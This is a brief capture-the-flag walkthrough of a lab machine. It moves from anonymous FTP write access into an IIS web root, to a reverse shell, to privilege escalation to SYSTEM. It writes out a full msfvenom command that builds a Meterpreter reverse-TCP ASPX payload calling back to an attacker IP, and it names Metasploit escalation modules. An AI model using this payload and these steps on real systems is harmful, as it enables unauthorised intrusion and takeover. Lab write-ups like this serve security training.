From nmap, there are ftp and http service.

Local Picture

This is the web page.

Local Picture

Take a look at ftp, we are able to do anonymous login, and it is the web page directory. We can upload .asp file or .aspx file and access them.

First, I create a demo.asp, and upload it by ftp. We can access it from http.

Local Picture

Local Picture

Then, I use msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.3" LPORT=9001 -f aspx > reverse.aspx to create a reverse shell payload, and upload it.

Local Picture

Open msf, use the exploit/multi/handler module to handle the reverse shell. We are now IIS APPPOOL\Web.

Local Picture

Further more, use post/multi/recon/local_exploit_suggester, and use one of the exploit, such as module windows/local/ms13_053_schlamperei. Now, we are NT AUTHORITY\SYSTEM, and we can get user.txt and root.txt.

Local Picture